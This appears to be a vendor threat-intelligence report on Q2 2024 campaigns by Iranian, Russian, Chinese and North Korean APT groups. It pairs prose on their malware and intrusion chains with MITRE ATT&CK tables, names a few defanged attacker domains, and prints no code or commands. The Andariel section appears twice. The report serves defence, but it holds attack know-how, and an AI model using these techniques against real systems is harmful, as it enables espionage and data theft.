APT Quarterly Highlights : Q2 2024
Published On : 2024-07-19
Share :
EXECUTIVE SUMMARY
In the second quarter of 2024, Advanced Persistent Threat (APT) groups from China, North Korea, Iran, and Russia demonstrated a surge in dynamic and innovative cyber activities, significantly challenging the global cybersecurity landscape.
Starting with Iran, state-sponsored threat actors exhibited advanced capabilities across various regions and sectors. Void Manticore (Storm-842) targeted Israeli organizations and Albania with destructive attacks and data theft, using custom wipers and web shells. MuddyWater focused on the Middle East, employing spear-phishing and remote monitoring tools to infiltrate the aviation and energy sectors. APT42 (Mint Sandstorm) impersonated journalists to gather intelligence in the US, Europe, and the Middle East, using custom backdoors like TAMECAT and NICECURL, underscoring the persistent and evolving threat from Iranian cyber actors.
Russian threat actors also demonstrated advanced cyber-espionage capabilities. APT28 (Forest Blizzard) targeted Polish government institutions with spear-phishing and DLL side-loading, exploiting CVE-2022-38028. Sandworm (APT44) used the Kapeka backdoor in attacks on Eastern Europe, focusing on ransomware and credential theft. FIN7 (Carbon Spider) expanded its focus from retail and hospitality to defense, insurance, and transportation sectors, deploying the Anunak backdoor via spear-phishing. These activities highlight the sophisticated threats from Russian APT groups, necessitating heightened security measures.
Meanwhile, Chinese state-sponsored threat actors exhibited notable cyber-espionage capabilities. RedJuliett targeted Taiwan and expanded operations to Hong Kong, South Korea, and the US, exploiting network device vulnerabilities to gather intelligence. APT41 (WICKED PANDA) continued its espionage with the resilient KEYPLUG malware on both Windows and Linux platforms. Earth Freybug, a subset of APT41, used DLL hijacking and API unhooking with the UNAPIMON malware to evade detection and conduct sophisticated reconnaissance, emphasizing the persistent and advanced threats from Chinese cyber groups.
Lastly, North Korean cyber threat actors intensified their espionage efforts. Kimsuky (Springtail) targeted South Korea with the new Gomir backdoor and sophisticated social engineering attacks, including the ReconShark malware via Facebook and the TRANSLATEXT Chrome extension. Moonstone Sleet (Storm-1789) engaged in financial and cyber espionage using fake companies, custom ransomware, and trojanized tools. The Lazarus Group used fake job lures to deliver the Kaolin RAT and exploited vulnerabilities for security bypasses. Andariel targeted Korean corporations with advanced RAT malware like Nestdoor and Dora RAT, highlighting North Korea’s persistent and evolving cyber capabilities.
This report provides a comprehensive analysis of the dynamic APT activities observed in Q2 2024, emphasizing the need for ongoing vigilance, user education, and prompt software updates in the ever-evolving cybersecurity landscape.
KEY TRENDS OBSERVED IN Q2 2024
Iranian APT activities were driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028.
There is a noticeable trend towards the diversification of attack techniques among North Korean APT groups. They are employing sophisticated methods, such as social engineering through platforms like Facebook and leveraging vulnerabilities in widely used applications and protocols.
Chinese APT groups are exploiting vulnerabilities in firewalls, VPNs, and load balancers globally to initiate attacks. This strategic approach demonstrates their intent to target a wide range of organizations regardless of geographical boundaries, emphasizing a broad-spectrum targeting strategy.
Chinese threat actors are continuously advancing their tactics, blending sophisticated multi-stage attacks with innovative evasion techniques. Additionally, there’s a notable trend towards developing new, sophisticated malware strains. This dual approach underscores their agility and adaptability in circumventing defenses and maintaining persistence in compromised networks.
IRANIAN APT ACTIVITIES
Targeted Country
Israel
Albania
Turkey
Azerbaijan
Jordan
Saudi Arabia
United States
Europe
Middle East
Targeted Technology
Windows operating system
PowerShell
Microsoft SharePoint
ScreenConnect
Atera
MeshCentral
Remote Monitoring and Management (RMM) tools
Targeted Industries
Government
Finance
Critical Infrastructure
NGOs
Media outlets
Academia
Legal services
Activist groups
Aviation
Communications
Energy
Void Manticore and Scarred Manticore
Void Manticore (aka Storm-842) is an Iranian state-sponsored threat actor notorious for conducting destructive attacks on Israeli organizations and leaking information through the online persona ‘Karma’ (sometimes written as KarMa). Their operations target sectors, such as government, finance, and critical infrastructure, aligning with Iran’s broader offensive strategy. Using straightforward and efficient techniques aimed at causing rapid and significant damage, they extend their attacks beyond Israel to countries like Albania, where they adopt the persona ‘Homeland Justice’ to leak stolen data. In Israel, Void Manticore is notable for using a custom wiper named BiBi, named after Israeli Prime Minister Benjamin Netanyahu. They often gain access to target systems via internet-facing web servers like CVE-2019-0604, deploying web shells, such as the custom “Karma Shell,” which can perform various malicious tasks while being disguised as an error page.
Additionally, they have been seen uploading a custom executable, do.exe, which checks for Domain Admin credentials and installs another web shell, reGeorge, suggesting possible initial access facilitation by another entity (possibly Scarred Manticore, a more sophisticated threat actor). Once inside, Void Manticore uses Remote Desktop Protocol (RDP) for lateral movement and SysInternal’s AD Explorer for network information gathering, establishing command and control (C2) channels using an OpenSSH client. This allows them to control the network environment and prepare for deploying destructive payloads, often using custom wipers that either corrupt specific files or destroy the system’s partition table. Notably, the CI Wiper employs a legitimate driver, ElRawDisk, to wipe files, disks, and partitions, a method seen in other Iran-associated wipers. The collaboration between Void Manticore and Scarred Manticore highlights a sophisticated coordination, enhancing Void Manticore’s effectiveness and reach through advanced capabilities and high-value target access, with their attacks often carrying politically charged messages, as demonstrated by the BiBi wiper.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059 Command and Scripting Interpreter
Execution T1059.003 Windows Command Shell
Execution T1129 Shared Modules
Defense Evasion T1202 Indirect Command Execution
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1036 Masquerading
Defense Evasion T1070 Indicator Removal
Defense Evasion T1070.001 Clear Windows Event Logs
Defense Evasion T1070.004 File Deletion
Defense Evasion T1497 Virtualization/Sandbox Evasion
Defense Evasion T1564 Hide Artifacts
Defense Evasion T1564.003 Hidden Window
Credential Access T1003 OS Credential Dumping
Credential Access T1539 Steal Web Session Cookie
Discovery T1010 Application Window Discovery
Discovery T1057 Process Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1518.001 Software Discovery: Security Software Discovery
Collection T1005 Data from Local System
Command and Control T1071 Application Layer Protocol
Command and Control T1071.001 Web Protocols
Impact T1485 Data Destruction
Impact T1490 Inhibit System Recovery
MUDDYWATER
Iran’s MuddyWater APT group has been actively targeting Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel across diverse economic sectors. Operating under the Iranian Ministry of Intelligence and Security (MOIS) since 2017, MuddyWater has focused extensively on the Middle East, particularly within Israel, using sophisticated Computer Network Exploitation (CNE) tactics. Their methods include employing social engineering techniques, like spear-phishing and exploiting known vulnerabilities to infiltrate networks in sectors such as aviation, academia, communications, government, and energy. The group often utilizes legitimate Remote Monitoring and Management (RMM) tools such as ScreenConnect, Atera, MeshCentral, and Advanced Monitoring Tool. In recently observed campaigns, MuddyWater initiates attacks through phishing emails from various legitimate domains controlled by the attacker. These emails contain links to download compressed files, which disguise malicious or seemingly benign RMM tools. Once activated, these tools enable the attacker to remotely control compromised systems, facilitating activities like file transfers, input device manipulation, and screen capturing. Additionally, the group deploys a C/C++-based tool to inject shellcode into targeted processes like msedge.exe, opera.exe, and powershell.exe, using WinAPI functions, such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to execute their malicious payloads.
MITRE ATT&CK Techniques
Tactics ID Techniques
Initial Access T1566.002 Phishing: Spearphishing Link
Execution T1203 Exploitation for Client Execution
Privilege Escalation T1548 Abuse Elevation Control Mechanism
Defense Evasion T1036 Masquerading
Defense Evasion T1548 Abuse Elevation Control Mechanism
Defense Evasion T1562 Impair Defenses
Defense Evasion T1562.001 Disable or Modify Tools
Defense Evasion T1564 Hide Artifacts
Defense Evasion T1564.003 Hidden Window
Credential Access T1003 OS Credential Dumping
Credential Access T1552 Unsecured Credentials
Credential Access T1552.001 Credentials In Files
Credential Access T1555 Credentials from Password Stores
Credential Access T1555.003 Credentials from Web Browsers
Discovery T1012 Query Registry
Discovery T1057 Process Discovery
Discovery T1082 System Information Discovery
Collection T1005 Data from Local System
Command and Control T1071 Application Layer Protocol
Command and Control T1573 Encrypted Channel
Impact T1485 Data Destruction
APT42, MINT SANDSTORM
APT42, a notorious cyber espionage group linked to the Iranian state and operating under the alias Mint Sandstorm, has been orchestrating a highly sophisticated social engineering campaign by impersonating journalists to infiltrate networks and gather intelligence, particularly targeting high-profile experts in Middle Eastern affairs. Their operations span strategic regions, including the United States, Israel, Europe, and the Middle East, targeting a diverse range of industries such as NGOs, media outlets, academia, legal services, and activist groups. The attack’s initial phase involves crafting credible journalist personas to establish trust with targets, which is then exploited to gain unauthorized network access. APT42 employs custom backdoors like TAMECAT, a PowerShell toehold for executing arbitrary commands, and NICECURL, a VBScript backdoor for downloading and executing additional modules for data mining and command execution. Their activities are driven by the motive to advance Iran’s intelligence objectives, particularly those aligned with the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), by gathering valuable intelligence and influencing decision-making processes to further Iran’s strategic interests in the region.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1203 Exploitation for Client Execution
Defense Evasion T1036 Masquerading
Defense Evasion T1564 Hide Artifacts
Defense Evasion T1564.003 Hidden Window
Credential Access T1003 OS Credential Dumping
Credential Access T1552 Unsecured Credentials
Credential Access T1552.001 Credentials In Files
Credential Access T1555 Credentials from Password Stores
Credential Access T1555.003 Credentials from Web Browsers
Discovery T1012 Query Registry
Discovery T1082 System Information Discovery
Collection T1005 Data from Local System
Command and Control T1071 Application Layer Protocol
Command and Control T1573 Encrypted Channel
Impact T1485 Data Destruction
RUSSIAN APT ACTIVITIES
Targeted Country
United States
Europe
Poland
Estonia
Ukraine
Targeted Technology
Windows Print Spooler service
Windows
Targeted Industries
Government
Automotive Manufacturer
APT28
Forest Blizzard, also known as STRONTIUM (APT28), a Russian-based threat actor, focuses on strategic intelligence gathering to support Russian government foreign policy initiatives. Forest Blizzard employs GooseEgg, a custom post-compromise tool, to gain elevated access to target systems, steal credentials, and facilitate malicious activities, such as remote code execution, installing backdoors, and lateral movement within compromised networks.
The group exploits CVE-2022-38028 (CVSS – 7.8) in the Windows Print Spooler service, using GooseEgg to modify a JavaScript constraints file and execute commands with SYSTEM-level permissions, enabling the launch of arbitrary executables or DLLs with elevated privileges. They manipulate registry keys, create custom protocol handlers, and hijack symbolic links to redirect system processes and execute malicious code. Historically, Forest Blizzard has targeted government, energy, transportation,
NGOs, media, IT, sports organizations, and educational institutions primarily in the United States and Europe. Their activities pose significant risks, including data breaches, credential theft, unauthorized access, and the compromise of sensitive information. The actor’s operations can disrupt functions, compromise network integrity, and facilitate espionage aligned with Russian government interests. Organizations are urged to apply security updates and implement defensive measures to mitigate the threat posed by Forest Blizzard. Alongside APT28, other threat actors like APT29, MISSION2025, and Stone Panda have also targeted CVE-2022-38028. The Cybersecurity and Infrastructure Security Agency (CISA) has added this vulnerability to its list of known vulnerabilities, emphasizing the importance of heightened vigilance and collaboration in defending against sophisticated cyber threats.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059 Command and Scripting Interpreter
Execution T1129 Shared Modules
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1112 Modify Registry
Discovery T1033 System Owner/User Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1087 Account Discovery
Command and Control T1071 Application Layer Protocol
Another sophisticated cyber-espionage campaign attributed to APT28 and linked to the Russian GRU has been actively targeting Polish government institutions. This campaign employs techniques such as DLL side-loading and executing scripts that download and execute additional payloads, showcasing a high level of technical proficiency and a diverse range of techniques and objectives. APT28’s operations are marked by the use of meticulously crafted spear-phishing emails, which appear legitimate and are personalized for their targets within government agencies. These emails often contain malicious links leading to websites like run[.]mocky[.]io and webhook[.]site, serving as initial entry points for malware delivery. Once the victims click on these links, they inadvertently download a ZIP archive containing malware, disguised as image files, including a Windows Calculator binary masquerading as a JPG image file, along with hidden batch script and DLL files. APT28 utilizes DLL side-loading to load a malicious DLL file while executing a legitimate application, evading detection by security software and allowing it to execute malicious code surreptitiously, thereby compromising the victim’s system. They demonstrate a keen understanding of network evasion tactics, leveraging widely used services like run.mocky.io and webhook[.]site to obscure their activities and reduce the likelihood of detection. Additionally, APT28 employs a multi-stage attack approach with social engineering tactics to maintain the illusion of legitimacy and deceive victims.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059 Command and Scripting Interpreter
Defense Evasion T1036 Masquerading
Defense Evasion T1202 Indirect Command Execution
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Defense Evasion T1564 Hide Artifacts
Defense Evasion T1564.001 Hidden Files and Directories
Defense Evasion T1564.003 Hidden Window
Defense Evasion T1070 Indicator Removal
Credential Access T1056 Input Capture
Credential Access T1539 Steal Web Session Cookie
Discovery T1082 System Information Discovery
Discovery T1497 Virtualization/Sandbox Evasion
Collection T1056 Input Capture
Command and Control T1071 Application Layer Protocol
APT44
A previously undocumented backdoor called Kapeka has been sporadically observed in cyber-attacks targeting Eastern Europe, including Estonia and Ukraine, since mid-2022. Researchers have attributed this malware to the Russia-linked APT group Sandworm (aka APT44 or Seashell Blizzard), with Microsoft tracking it under the name KnuckleTouch. Kapeka is a flexible backdoor that functions as an early-stage toolkit for its operators and provides long-term access to the victim’s systems. It features a dropper designed to launch and execute the backdoor component on the infected host, then remove itself. The dropper sets up persistence for the backdoor, either as a scheduled task or autorun registry, depending on whether the process has SYSTEM privileges. Microsoft noted that Kapeka is involved in multiple campaigns distributing ransomware and can steal credentials and data, conduct destructive attacks, and grant remote access to the device. The backdoor, a Windows DLL written in C++, includes an embedded command-and-control (C2) configuration to establish contact with an actor-controlled server and manage polling frequency for retrieving commands. Masquerading as a Microsoft Word add-in, the backdoor gathers information about the compromised host and uses multi-threading to process instructions and exfiltrate results to the C2 server. It communicates with its C2 using JSON to send and receive information and can update its C2 configuration on the fly. Key features of the backdoor include reading and writing files, launching payloads, executing shell commands, and upgrading or uninstalling itself.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059 Command and Scripting Interpreter
Execution T1129 Shared Modules
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1027.005 Indicator Removal from Tools
Defense Evasion T1112 Modify Registry
Defense Evasion T1140 Deobfuscate/Decode Files or Information
Defense Evasion T1218.011 System Binary Proxy Execution: Rundll32
Defense Evasion T1222 File and Directory Permissions Modification
Defense Evasion T1497 Virtualization/Sandbox Evasion
Discovery T1012 Query Registry
Discovery T1033 System Owner/User Discovery
Discovery T1057 Process Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1087 Account Discovery
Discovery T1518 Software Discovery
Discovery T1518.001 Security Software Discovery
Discovery T1614 System Location Discovery
Collection T1560 Archive Collected Data
Command and Control T1071 Application Layer Protocol
Command and Control T1573 Encrypted Channel
FIN7
FIN7, a Russian advanced persistent threat (APT) group also known as Carbon Spider, ELBRUS, and Sangria Tempest, recently conducted a spear-phishing campaign targeting a US automotive manufacturer. The attackers focused on IT employees with high admin-level rights, luring them with a malicious URL disguised as an IP scanning tool. Upon clicking the link, the Anunak backdoor was deployed, enabling FIN7 to gain an initial foothold using living-off-the-land binaries, scripts, and libraries (lolbas). Historically, FIN7 has targeted the US retail, hospitality, and restaurant sectors, but it is now expanding its focus to the defense, insurance, and transportation sectors. Researchers suggest that FIN7 is likely targeting larger entities, anticipating higher ransom payments.
MITRE ATT&CK Techniques
Tactics ID Techniques
Initial Access T1566.002 Phishing: Spearphishing Link
Execution T1204.002 User Execution: Malicious File
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Execution T1569.002 System Services: Service Execution
Persistence T1053.005 Scheduled Task/Job: Scheduled Task
Persistence T1543.003 Create or Modify System Process: Windows Service
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1564.001 Hide Artifacts: Hidden Files and Directories
Defense Evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Defense Evasion T1562.004 Impair Defenses: Disable or Modify System Firewall
Discovery T1124 System Time Discovery
Discovery T1057 Process Discovery
Discovery T1087.002 Account Discovery: Domain Account
Discovery T1069.002 Permission Groups Discovery: Domain Groups
Discovery T1082 System Information Discovery
Discovery T1033 System Owner/User Discovery
Lateral Movement T1021.004 Remote Services: SSH
Command-and-Control T1571 Non-Standard Port
Command-and-Control T1090 Proxy
Resource Development T1608.005 Stage Capabilities: Link Target
Resource Development T1583.001 Acquire Infrastructure: Domains
CHINESE APT ACTIVITIES
Targeted Country
Taiwan
Hong Kong
South Korea
Laos
United States
Rwanda
Kenya
Djibouti
Italy
Targeted Industries
Aerospace
Education
Semiconductor
Manufacturing
Technology
Government
Targeted Technology
Windows
Linux
REDJULIETT
In Q2 2024, researchers reported that between November 2023 and April 2024, a likely Chinese state-sponsored group, known as RedJuliett exploited known vulnerabilities in network edge devices, such as firewalls, VPNs, and load balancers for initial access. Operating from Fuzhou, China, RedJuliett persistently targeted Taiwan, likely to support Beijing’s intelligence collection on Taiwan’s economic and diplomatic relations, as well as critical technology development. The group expanded its operations to compromise organizations in Hong Kong, Malaysia, Laos, South Korea, the United States, Djibouti, Kenya, and Rwanda. RedJuliett used SQL injection and directory traversal exploits against web and SQL applications, in addition to targeting internet-facing device vulnerabilities. The group created a SoftEther VPN bridge or client in victim networks and conducted reconnaissance and exploitation using web application security scanners, leveraging open-source web shells and exploiting an elevation of privilege vulnerability in Linux. RedJuliett’s infrastructure includes both threat actor-controlled leased servers and compromised infrastructure belonging to Taiwanese universities. The group’s activities align with Beijing’s objectives to gather intelligence on Taiwan’s economic policy, trade, and diplomatic relations, and they have also targeted multiple critical technology companies, emphasizing the strategic importance of this sector for Chinese state-sponsored threat actors.
MITRE ATT&CK Techniques
Tactics ID Techniques/ Sub Techniques
Resource Development T1583.003 Acquire Infrastructure: Virtual Private Server
Resource Development T1584 Compromise Infrastructure
Reconnaissance T1595.002 Active Scanning: Vulnerability Scanning
Initial Access T1190 Exploit Public-Facing Application
Persistence T1133 External Remote Services
Persistence T1505.003 Server Software Component: Web Shell
Privilege Escalation T1068 Exploitation for Privilege Escalation
APT41
APT41, also known as WICKED PANDA, is a highly sophisticated Chinese-backed cyber threat group renowned for its extensive cyber espionage and cybercrime operations. Their latest campaign involves the deployment of the KEYPLUG malware, a modular backdoor written in C++ and active since at least June 2021, with variants for both Windows and Linux platforms. KEYPLUG employs advanced techniques for command and control (C2) communication, including HTTP, TCP, KCP over UDP, and WSS. The malware exhibits high resilience and stealth, remaining undetected in environments with advanced detection solutions. The Windows variant involves a .NET loader that decrypts and executes shellcode, leading to the final payload, while the Linux variant demonstrates even greater complexity. Both variants utilize custom algorithms for API hashing and employ techniques to evade security measures, highlighting the advanced capabilities and persistent threat posed by APT41.
MITRE ATT&CK Techniques
Tactics ID Techniques/Sub-Techniques
Initial Access T1566 Phishing
Execution T1047 Windows Management Instrumentation
Defense Evasion T1070.006 Indicator Removal: Timestomp
T1497.001 Virtualization/Sandbox Evasion: System Checks
Credential Access T1056.004 Input Capture: Credential API Hooking
Discovery T1010 Application Window Discovery
Discovery T1057 Process Discovery
Discovery T1082 System Information Discovery
Discovery T1497 Virtualization/Sandbox Evasion
Discovery T1518.001 Software Discovery: Security Software Discovery
Collection T1056.004 Input Capture: Credential API Hooking
Command and Control T1071 Application Layer Protocol
EARTH FREYBUG
At the beginning of Q2 2024, researchers observed Earth Freybug; a subset of APT41, leveraging DLL hijacking and API unhooking to evade detection, using a newly discovered malware, UNAPIMON. This malware employs defense evasion techniques to prevent child processes from being monitored. The attack chain begins with a legitimate process, vmtoolsd.exe, being hijacked to execute a scheduled task that runs a reconnaissance batch file. This file gathers system information and sets up another task to deploy a backdoor through DLL side-loading using the SessionEnv service. UNAPIMON, a DLL malware, hooks the CreateProcessW function, creates a suspended process, and verifies DLL integrity before unhooking critical APIs in the child process. This allows malicious activities to proceed undetected. The attack highlights Earth Freybug’s evolving tactics and the effectiveness of simple yet innovative techniques in sophisticated cyber espionage campaigns.
MITRE ATT&CK Techniques
Tactics ID Techniques/Sub Techniques
Execution T1053 Scheduled Task/Job
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Discovery T1082 System Information Discovery
ADDITIONAL OBSERVATIONS
The Chinese APT group ChamelGang has been deploying ransomware in its cyberespionage campaigns, targeting critical sectors like healthcare and government organizations. In 2022, they attacked significant institutions in India and Brazil, and in 2023, they focused on a government organization in East Asia and an aviation organization in the Indian subcontinent. ChamelGang uses CatB ransomware, obfuscated malware like BeaconLoader, and Cobalt Strike beacons for their operations. They utilize publicly available tools for privilege escalation and proxies for routing malicious traffic. Their tactics include obfuscation, exploitation of remote services, and masquerading malware components to evade detection.
NORTH KOREA APT ACTIVITIES
Targeted Country
South Korea
Asia
Targeted Technology
Software
Windows
Linux
Applications
Targeted Industries
Government
Software
Education
Manufacturing
Construction
KIMSUKY
In Q2 2024, researchers identified that the North Korean cyber espionage group, Springtail (also known as Kimsuky), has been deploying a new Linux backdoor called Gomir in their recent campaign against South Korean organizations. This malware has structural similarities with GoBear and extensive code sharing between the two. Springtail has a history of targeting South Korean public sector organizations, employing sophisticated methods like spear-phishing and exploiting improperly configured DNS DMARC policies. In their latest campaign, the group used Trojanized software installation packages to distribute a new malware family named Troll Stealer, capable of stealing files, screenshots, browser data, and system information, including the GPKI folder used by South Korean government personnel. Gomir, upon execution, can install itself persistently by creating a system service or configuring a crontab based on its privilege level. It communicates with its command-and-control server using HTTP POST requests, allowing the execution of various commands such as executing shell commands, collecting system information, and exfiltrating files. This campaign underscores a heavy focus on supply chain attacks, utilizing techniques such as Trojanized software installers and fake software installers to maximize infection rates among their targeted South Korean-based organizations.
MITRE ATT&CK Techniques
Tactics ID Techniques/Sub Techniques
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
Defense Evasion T1497.001 Virtualization/Sandbox Evasion: System Checks
Discovery T1497.001 Virtualization/Sandbox Evasion: System Checks
Discovery T1518.001 Software Discovery: Security Software Discovery
Command and Control T1071 Application Layer Protocol
Command and Control T1095 Non-Application Layer Protocol
The Kimsuky APT group has recently initiated another sophisticated cyber espionage campaign leveraging Facebook as an initial entry point, posing as human rights officials to target anti-North Korea sectors. Using fake profiles, they engage targets via Facebook Messenger, gradually building trust before sharing malicious OneDrive links disguised as legitimate documents, such as ‘My_Essay(prof).msc’. This Microsoft Common Console Document file, when executed, triggers a concealed malware dubbed ReconShark. This variant exhibits advanced capabilities, including stealthy execution and connection to a command and control (C2) server. The malware’s tactics include persistent file manipulation (‘warm.vbs’) and task scheduling (‘OneDriveUpdate’), aimed at maintaining long-term access and exfiltrating sensitive information. The campaign’s global scope and use of deceptive social engineering underscore its evolving threat landscape.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059 Command and Scripting Interpreter
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1036 Masquerading
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading
Discovery T1046 Network Service Discovery
Discovery T1082 System Information Discovery
Command and Control T1071 Application Layer Protocol
Command and Control T1095 Non-Application Layer Protocol
Meanwhile, in Q2 2024, researchers discovered new activity from Kimsuky, involving the use of a malicious Google Chrome extension named “TRANSLATEXT” for cyber espionage. This extension, uploaded to an attacker-controlled GitHub repository in March, was designed to steal email addresses, usernames, passwords, and cookies, and capture browser screenshots. TRANSLATEXT bypasses the security measures of prominent email providers like Gmail, Kakao, and Naver. The attack primarily targeted South Korean academics involved in political research related to North Korea. Kimsuky’s tactics included using PowerShell scripts and manipulating the Windows registry to enforce extension installation. The group’s ongoing campaign emphasizes the need for vigilance against such advanced threats.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Persistence T1176 Browser Extensions
Credential Access T1555.003 Credentials from Password Stores: Credentials from Web Browsers
Collection T1113 Screen Capture
Command and Control T1071.001 Application Layer Protocol: Web Protocols
Command and Control T1102.001 Web Service: Dead Drop Resolver
Exfiltration T1041 Exfiltration Over C2 Channel
In Q2 2024, researchers found that Kimsuky exploited the MS Office Equation Editor vulnerability (CVE-2017-11882) to distribute a keylogger. The keylogger was delivered via an embedded malicious script executed by mshta.exe, which connected to a URL hosting the script disguised as an error page. The script downloaded additional malware, created a file named desktop.ini.bak to store keylogging and clipboard data, and attempted to register itself in the Windows registry to run at startup. Despite a coding error preventing registry registration, the keylogger collected and sent data to the command-and-control server before deletion and recreation.
MITRE ATT&CK Techniques
Tactics ID Techniques/ Sub Techniques
Initial Access T1190 Exploit Public-Facing Application
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Defense Evasion T1027 Obfuscated Files or Information
Credential Access T1056 Input Capture
Collection T1005 Data from Local System
Exfiltration T1041 Exfiltration Over C2 Channel
MOONSTONE SLEET
At the beginning of Q2 2024, researchers identified a new North Korean threat actor, Moonstone Sleet (also tracked as Storm-1789), which employs both established and unique attack methodologies for financial and cyberespionage objectives. This group sets up fake companies and job opportunities to engage targets, uses trojanized legitimate tools, creates a malicious game, and deploys custom ransomware. Moonstone Sleet, initially overlapping with Diamond Sleet, now operates with its own infrastructure and attack methods. Notable tactics include delivering trojanized PuTTY via social media and freelancing platforms, using malicious npm packages, and creating fake companies like StarGlow Ventures and C.C. Waterfall. The group has developed a malicious tank game, DeTankWar, and a ransomware variant, FakePenny, to target companies. Moonstone Sleet’s operations indicate a well-resourced actor with capabilities inherited from prior North Korean cyber operations, suggesting a strategic alignment with North Korean cyber objectives.
MITRE ATT&CK Techniques
Tactics ID Techniques
Execution T1129 Shared Modules
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Command and Control T1071 Application Layer Protocol
Impact T1486 Data Encrypted for Impact
LAZARUS
By the beginning of Q2 2024, researchers discovered that the North Korea-linked Lazarus Group used fake job lures to deliver the new Kaolin RAT in attacks on individuals in Asia in the summer of 2023. The Kaolin RAT, which can change file timestamps and load DLL binaries from command-and-control (C2) servers, also serves as a conduit for the FudModule rootkit. This rootkit exploits a patched vulnerability in the appid.sys driver (CVE-2024-21338 with CVSS 7.8) to disable security mechanisms. Lazarus’s Operation Dream Job campaign uses social media and instant messaging platforms to trick targets into launching malicious ISO files containing a renamed Windows application “AmazonVNC.exe” that side-loads “version.dll” and injects a payload from “aws.cfg.” This payload downloads shellcode from a hacked Italian company website, launching RollFling and subsequently RollSling, which loads RollMid. RollMid establishes C2 communication through a three-step process involving HTML files, PNG images with steganography, and Base64-encoded data blobs, ultimately fetching the Kaolin RAT. The malware enumerates files, performs file operations, uploads to C2, alters timestamps, manages processes, executes commands, and connects to hosts. Lazarus’s complex and evolving attack chain demonstrates significant resource investment and innovation, posing a substantial challenge to cybersecurity defenses.
MITRE ATT&CK Techniques
Tactics ID Techniques
Initial Access T1566 Phishing
Execution T1059 Command and Scripting Interpreter
Persistence T1547 Registry Run Keys / Startup Folder
Defense Evasion T1027 Obfuscated Files or Information
Defense Evasion T1036 Masquerading
Defense Evasion T1497 Virtualization/Sandbox Evasion
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Collection T1005 Data from Local System
Command and Control T1071 Application Layer Protocol
Exfiltration T1041 Exfiltration Over C2 Channel
ANDARIEL
Researchers identified new Andariel APT attack campaigns targeting Korean corporations in Q2 of 2024. These attacks employed a variety of malware tools, including keyloggers, infostealers, and proxy tools alongside backdoors, aimed at gaining control and exfiltrating data from compromised systems. Notably, Nestdoor, a persistent RAT malware, featured prominently in these campaigns, leveraging tactics such as exploiting the Log4Shell vulnerability in VMware Horizon and disguising itself as legitimate software like OpenVPN to maintain persistence through task scheduling and command-and-control (C&C) server communication. Recently, Andariel has also introduced a new malware strain, Dora RAT, developed in Go, supporting basic functionalities like reverse shell and file operations, sometimes signed with valid certificates to evade detection. In addition to direct attacks, the group has been observed using proxy tools akin to those previously linked to Lazarus Group activities, underscoring their sophistication and adaptation of tactics over time.
MITRE ATT&CK Techniques
Tactics ID Techniques/SubTechniques
Initial Access T1566 Phishing
Execution T1129 SharedModules
Defense Evasion T1027.005 ObfuscatedFiles or Information: Indicator Removal from Tools
Credential Access T1056.001 InputCapture: Keylogging
Discovery T1082 SystemInformation Discovery
Discovery T1083 Fileand Directory Discovery
Discovery T1518.001 SoftwareDiscovery: Security Software Discovery
Collection T1056.001 InputCapture: Keylogging
Collection T1115 ClipboardData
Commandand Control T1071 ApplicationLayer Protocol
ANDARIEL
Researchers identified new Andariel APT attack campaigns targeting Korean corporations in Q2 of 2024. These attacks employed a variety of malware tools, including keyloggers, infostealers, and proxy tools alongside backdoors, aimed at gaining control and exfiltrating data from compromised systems. Notably, Nestdoor, a persistent RAT malware, featured prominently in these campaigns, leveraging tactics such as exploiting the Log4Shell vulnerability in VMware Horizon and disguising itself as legitimate software like OpenVPN to maintain persistence through task scheduling and command-and-control (C&C) server communication. Recently, Andariel has also introduced a new malware strain, Dora RAT, developed in Go, supporting basic functionalities like reverse shell and file operations, sometimes signed with valid certificates to evade detection. In addition to direct attacks, the group has been observed using proxy tools akin to those previously linked to Lazarus Group activities, underscoring their sophistication and adaptation of tactics over time.
MITRE ATT&CK Techniques
Tactics ID Techniques/Sub Techniques
Initial Access T1566 Phishing
Execution T1129 Shared Modules
Defense Evasion T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
Credential Access T1056.001 Input Capture: Keylogging
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1518.001 Software Discovery: Security Software Discovery
